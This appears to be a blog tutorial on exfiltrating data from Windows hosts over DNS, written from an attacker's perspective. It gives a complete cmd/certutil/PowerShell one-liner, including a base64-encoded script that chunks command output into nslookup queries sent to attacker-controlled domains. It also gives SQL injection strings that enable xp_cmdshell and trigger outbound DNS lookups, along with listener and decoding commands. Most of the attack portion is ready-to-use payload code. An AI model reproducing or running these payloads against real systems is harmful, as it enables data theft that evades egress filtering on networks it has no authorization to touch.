PowerShell — Data Ex-filtration over DNS (OOB)

AliBawazeEer
4 min readAug 17, 2020

--

increasingly, companies considering security a top priority and ex-filtration of data are more restricted.

The OOB techniques often useful in a blind vulnerability , as an attacker you don’t get the output of exploit in direct response , for instance in a web-app vulnerable to blind injection . an attacker require a entity to generate an outbound TCP/UDP/ICMP request and that will then allow an attacker to exfiltrate data

For this purpose , as an attacker utilizing a built in system tool with less privileges and one-liner payloads to achieve malicious objective.

The DNS protocol is an excellent channel. It is Less monitored in comparison to other Internet protocols like . HTTP, FTP for posing a lesser risk. Thus, it has higher chance of bypassing egress filtering

Egress filtering: is the practice of monitoring and potentially restricting the flow of information outbound from one network to another

Challenges

  • The DNS protocol restricts queries (i.e. outbound messages) to 255 bytes of letters, digits, and hyphens
  • DNS protocol is used mostly over the User Datagram Protocol (UDP), there is no guarantee that queries will be replied based on their order of arrival
  • Maximum length of Subdomain label is 63 characters Overcoming previous challenges Generic process for DNS Ex-filtration.

Overcoming previous challenges Generic process for DNS Ex-filtration

DNS Ex-filtration

Payload in parts;

The payload created is as shown below. It will send output of ipconfig over DNS to dnspent​.redacted.com

cmd /v /c ipconfig > C:\Windows\Temp\output70 && certutil -encodehex -f C:\Windows\Temp\output70 C:\Windows\Temp\output70.hex 4 && powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgB1AHMAZQByADcAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABqACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA==

[#] Let’s understand the payload in parts:

cmd /v /c “ipconfig > C:\Windows\Temp\outab && certutil -encodehex -f C:\Windows\Temp\outab C:\Windows\Temp\outab.hex 4

output in hex format

above command write the output to a file, then hexencode it with ‘certutil’ in a specific format (in columns with spaces, without the characters and the addresses), and is represented by code 4.

This will be the Hex value you can decode it using: https://gchq.github.io/CyberChef “ HEX”

Second part: ​It will run a PowerShell script in Base64 encoded format to avoid breaking syntax when its injected in web app due to escaping or breaking SQL query. This script will read the hex encoded output file, break the content into chunks and then generate DNS queries in specific format i.e.

powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBSAEgAUABcAEQAZQBzAGsAdABvAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgBkAG4AcwBwAGUAbgAuAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtACIAOwAkAGoAIAArAD0AIAAxADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIABuAHMAbABvAG8AawB1AHAAIAAkAGYAaQBuAGEAbAAgAH0A

Plain Script:

$text=Get-Content C:\Windows\Temp\output70.hex;$subdomain=$text.replace(“ “,””);$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+”.”+$i+”.file.dnspen.redacted.com”;$j += 1; Start-Process -NoNewWindow nslookup $final }

Note: This is not a normal base64 encoder! converts the string to UTF-16LE first before encoding, as that is what PowerShell expects! To execute

encoding PowerShell

Powershell.exe -exec bypass -enc {$encoded_script}

cmd:>cmd /v /c “ipconfig > C:\Users\IRHP\Desktop\output70 && certutil -encodehex -f C:\Users\IRHP\Desktop\output70 C:\Users\IRHP\Desktop\output70.hex 4 && powershell -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBSAEgAUABcAEQAZQBzAGsAdABvAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgBkAG4AcwBwAGUAbgAuAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtACIAOwAkAGoAIAArAD0AIAAxADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIABuAHMAbABvAG8AawB1AHAAIAAkAGYAaQBuAGEAbAAgAH0A

Hex-Encoded

Data Ex-filtration over DNS via SQLi

when exploiting blind injection or second order <SQL injection>

Exploit this further to Retrieve the data using out-of-band (OOB) channels — DNS.

Start a DNS listener on your Kali

In order to execute command in SQL server via web app vulnerable to SQL injection you need to ensure xp_cmdshell is enabled in the backend.

Below is a second order SQL injection which value filled in secure update profile

‘;exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure ‘xp_cmdshell’, 1;RECONFIGURE; —

‘;exec master..xp_cmdshell ‘cmd.exe /c nslookup ​tester​.dnspen​X​.attacker.com’; —

Exploitation ;

Start DNS listener to save output in file when doing ex-filtration

As there is a limit on size and type of data that can be sent over DNS channels, we need to used above created payload that will encode the output, break it into chunks and then send it over the DNS channel with sequence numbers appended to them

Once the OOB calls are received, the output can be sorted with the help of sequence numbers as UDP packets do not have an arrival order

root@Kali:~# tcpdump -n udp port 53 -i any | tee oob.txt

Extract plain-text data from file

root@Kali:~# egrep -o ‘[0–9]{5}+\.+[0–9a-fA-F]{0,62}’ oob.txt|sort -u|cut -d. -f2|xxd -r -p

References ;

https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1
https://github.com/Arno0x/DNSExfiltrator
https://pentest.blog/data-ex-filtration-with-dns-in-sqli-attacks/https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://adsecurity.org/?p=478
https://raikia.com/tool-powershell-encoder/

--

--

No responses yet